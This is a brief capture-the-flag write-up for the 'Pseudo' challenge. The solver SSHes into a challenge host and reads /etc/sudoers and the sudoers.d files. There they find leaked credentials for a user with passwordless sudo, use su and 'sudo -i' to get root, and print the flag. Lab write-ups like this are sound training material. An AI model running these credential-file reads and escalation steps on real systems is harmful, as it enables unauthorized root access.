Pseudo
by vishalananth
Someone here has special powers… but who? And how!?
Connect here: ssh -p 50014 user@jh2i.com # password is ‘userpass’
Solution
After looking at nearly everything within the remote machine, we finally saw that the /etc/sudoers file contained:
....
....
#includedir /etc/sudoers.d
So we tried to read whatever is in sudoers.d using
cat /etc/sudoers.d/*
.....
.....
# The credentials for the 'todd' account is 'needle_in_a_haystack'
todd ALL = NOPASSWD: ALL
We got the credentials of todd and see he has root access, switching to todd and then to root using:
su todd
password: needle_in_a_haystack
sudo -i
cat flag.txt
gives us the flag
Flag
flag{hmmm_that_could_be_a_sneaky_backdoor}